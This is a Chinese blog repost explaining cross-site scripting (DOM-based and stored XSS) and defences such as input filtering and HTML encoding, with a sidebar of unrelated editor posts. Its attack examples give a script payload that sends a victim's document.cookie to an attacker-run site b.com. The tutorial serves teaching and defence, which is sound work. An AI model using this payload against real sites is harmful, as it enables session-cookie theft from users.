XSS攻击及防御

最新推荐文章于 2023-06-17 10:26:08 发布
最新推荐文章于 2023-06-17 10:26:08 发布
阅读量432 收藏
点赞数
分类专栏: java 文章标签: XSS攻击及防御 xss 脚本攻击

原文: http://blog.csdn.net/ghsau/article/details/17027893

 XSS攻击及防御

       XSS又称CSS,全称Cross SiteScript,跨站脚本攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。
其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当其它用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。如,盗取用户Cookie、破坏页面结构、重定向到其它网站等。
====================================================================================
XSS攻击  
       XSS攻击类似于SQL注入攻击,攻击之前,我们先找到一个存在XSS漏洞的网站,XSS漏洞分为两种,一种是DOM Based XSS漏洞,另一种是Stored XSS漏洞。理论上,所有可输入的地方没有对输入数据进行处理的话,都会存在XSS漏洞,漏洞的危害取决于攻击代码的威力,攻击代码也不局限于script。

1.DOM Based XSS
DOM Based XSS是一种基于网页DOM结构的攻击,该攻击特点是中招的人是少数人。

当我登录a.com后,我发现它的页面某些内容是根据url中的一个叫content参数直接显示的,猜测它测页面处理可能是这样,其它语言类似:
<body>
       页面内容:<%=request.getParameter("content")%>
</body>
我知道了Tom也注册了该网站,并且知道了他的邮箱(或者其它能接收信息的联系方式),我做一个超链接发给他,超链接地址为:http://www.a.com?content=<script>window.open(“www.b.com?param=”+document.cookie)</script>,当Tom点击这个链接的时候(假设他已经登录a.com),浏览器就会直接打开b.com,并且把Tom在a.com中的cookie信息发送到b.com,b.com是我搭建的网站,当我的网站接收到该信息时,我就盗取了Tom在a.com的cookie信息,cookie信息中可能存有登录密码,攻击成功!这个过程中,受害者只有Tom自己。

2.Stored XSS
Stored XSS是存储式XSS漏洞,由于其攻击代码已经存储到服务器上或者数据库中,所以受害者是很多人。
a.com可以发文章,我登录后在a.com中发布了一篇文章,文章中包含了恶意代码,<script>window.open(“www.b.com?param=”+document.cookie)</script>,保存文章。这时Tom和Jack看到了我发布的文章,当在查看我的文章时就都中招了,他们的cookie信息都发送到了我的服务器上,攻击成功!这个过程中,受害者是多个人。
Stored XSS漏洞危害性更大,危害面更广。

====================================================================================
XSS防御

完善的过滤体系
永远不相信用户的输入。需要对用户的输入进行处理,只允许输入合法的值,其它值一概过滤掉。

Html encode

 假如某些情况下,我们不能对用户数据进行严格的过滤,那我们也需要对标签进行转换。

<
&lt;
>
&gt;
&
  &amp;
"
&quot;
空格
&nbsp;

比如用户输入:<script>window.location.href=”http://www.baidu.com”;</script>,

保存后最终存储的会是:&lt;script&gt;window.location.href=&quot;http://www.baidu.com&quot;&lt;/script&gt;

在展现时浏览器会对这些字符转换成文本内容显示,而不是一段可执行的代码。



清晨Feelter
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vue整合富文本编辑器 Vue-Quill-Editor
qq_66798107的博客
02-21 942
vue-quill-editor 富文本图片是base64解决办法,粘贴图片,导览栏,滚动条等问题解决方案
vue-quill-editor汉化
lao_wang_tou的博客
03-09 1917
.ql-snow .ql-picker.ql-size .ql-picker-label::before, .ql-snow .ql-picker.ql-size .ql-picker-item::before { content: "14px" !important; } .ql-snow .ql-picker.ql-size .ql-picker-label[data-value=...
quill 富文本编辑器常见问题汇总
weixin_44067399的博客
05-18 6355
最近项目里用到了这个quill 富文本编辑器,网上一看,woc骂声一片。其实我觉得是中文的翻译,以及介绍不够详尽导致的,其实这个富文本编辑器还是很友善的。 官方github地址:https://github.com/quilljs/quill 官方文档:https://quilljs.com/docs/quickstart/ 关于插入表格 如果你需要拥有插入表格的功能, 你要确保你用的是quill而不是vue-quill-editor。 这是由于 quill 在2.0版本之后才对外提供了getModu
quill已死,谨慎使用
lefex的博客
02-26 4979
大家好,很长时间没更新文章了,前段时间比较忙,接下来这段时间又能踏实搞点技术,学点东西了。编辑器quill 发布将近10年,现在已经不维护了:所以你在做编辑器时,切记不要选它了!!!你可能...
Quill编辑器在Safari浏览器中的一个坑
lefex的博客
06-17 244
最近使用 Quill 时在Safari下遇到一个坑,内容输入后,在某些浏览器版本无法删除。这个坑有2个”特色“:第一:打开调试面板后,该问题自动消失这让调试起来非常困难,只能通过把日志信息写入到DOM中进行调试。还有一种手段,观察有问题和无问题的DOM结构,找出差异点。第二:使用React来渲染编辑器,该问题也不会存在我有一个编辑器demo使用的是React,使用了Quill最新的SDK,在这个项...
vue-quill-editor 多个富文本编辑器 点击上传图片所遇到的坑
weixin_39078894的博客
03-12 1177
<template> <div> <el-row> <!-- myQuillEditor --> <quill-editor v-model="content" class="qediter" ref="myQuillEditor" :options="editorOption" @change="onEditorChange($event)" @focus="onEdi.
web安全之XSS攻击防御pdf
08-25
### Web安全之XSS攻击防御 #### 一、XSS基本原理 ##### 1.1 什么是XSS 跨站脚本攻击(Cross-Site Scripting,简称XSS)是一种常见的Web应用程序安全漏洞,其形成原因主要是由于Web应用程序对用户输入的数据过滤不...
8、XSS 攻击防御pdf资料
最新发布
10-15
为了防御XSS攻击,开发者需要采取一系列措施,包括但不限于: - 对用户输入进行严格的过滤和转义,确保任何可能包含恶意脚本的数据在显示之前都被安全处理。 - 使用HTTP头部的Content-Security-Policy(CSP)来限制...
Web安全之XSS攻击防御小结
02-23
攻击者对含有漏洞的服务器发起XSS攻击(注入JS代码)。诱使受害者打开受到攻击的服务器URL。受害者在Web浏览器中打开URL,恶意脚本执行。(1)反射型:发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,...
.net core xss攻击防御的方法
10-18
主要介绍了.net core xss攻击防御的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
XSS攻击防御代码的简单演示
04-25
XSS(Cross-Site Scripting)是一种常见的网络安全...通过理解和实践这些防御措施,开发者能够提高Web应用的安全性,保护用户免受XSS攻击的危害。同时,定期进行安全性审计和代码审查也是确保Web应用安全的重要环节。
2020-03-20 QuillEditor编辑器疑难杂症汇总
♀我爱摇滚,更爱金属乐♀
03-20 1585
image.png Quill 是一个让人又爱又恨的可见即所得富文本编辑器,尽管它的常规功能不如tinyMCE那么完善,界面也不如国产的wangEditor,使用上的坑也比较多。但它的定制性很强大,它的不足几乎都可以通过DIY方式来弥补,本文主要是针对QuillEditor在使用上碰到的问题进行了一些汇总,将会持续更新。 问题1. 粘贴后光标会自动弹到文档的初始位置。...
vue中使用编辑器vue-quill-editor踩过的坑
热门推荐
maggie_live的博客
03-20 1万+
结合vue+element-ui+vue-quill+editor二次封装成组件 1.图片上传 分析原因 项目中使用vue-quill-editor富文本编辑器,在编辑内容的时候,我们往往会编辑图片,而vue-quill-editor默认的处理方式是直接将图片转成base64格式,导致上传的内容十分庞大,且服务器接受post的数据的大小是有限制的,很有可能就提交失败,造成用户体验差。 引入elem...
Quill安装及使用
weixin_44094836的博客
11-03 3786
富文本编辑器。首先从选择开始 https://blog.csdn.net/davidhzq/article/details/100842866 对每个富文本的选择跟优缺点涵盖比较完整的,为了稳定最后还是选择Quill.没有选择TinyMCE,TinyMCE的功能比较强大。客户需求多的可以使用。 1、安装 npm install vue-quill-editor --save 2、引用 html引用模块 <div> <quill @on-change="changeValue" :open
Vue富文本编辑器Editor(vue-quill-editor)使用与入门
执着
04-22 1万+
Vue富文本编辑器Editor(vue-quill-editor)的使用,以及组件初始化,页面输出渲染。
富文本编辑框vue-quill-editor的使用和优化
liuguochao1024的博客
02-22 5636
最近做了一个文章上传的项目,因为考虑到文章内容中有文字样式的需求和图片的插入,就做了一个富文本框的功能,我选择的插件就是vue-quill-editor,下边总结一下我在这里边踩过的坑和解决方案。分为两大部分来讲解,使用和优化 一、使用 1,下载插件 npm install vue-quill-editor --save 2,引用 在vue的mai...
百度编辑器安全漏洞及其护措施
极客神殿
08-10 2190
跟老赵头儿学开发之十四 : 百度编辑器安全漏洞及其护措施 百度编辑器UEditor 是一套开源的在线html编辑器,它是由百度web前端研发部开发的所见即所得的富文本web编辑器,开发人员可以用 UEditor 把传统的多行文本输入框(textarea)替换为可视化的富文本框。 UEditor既可以录入文本也可以上传图片,还可以支持自定义的html编写,支持电脑端及移动端,自适应页面,图片也可...
pdf xss攻击 如何防御
07-27
PDF XSS攻击是指通过在PDF文档中插入恶意代码来攻击用户的...总而言之,通过使用安全的解析器和过滤器、验证和过滤上传的PDF文件、更新软件补丁、使用沙盒技术以及提高用户意识和警惕性,可以有效地防御PDF XSS攻击
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值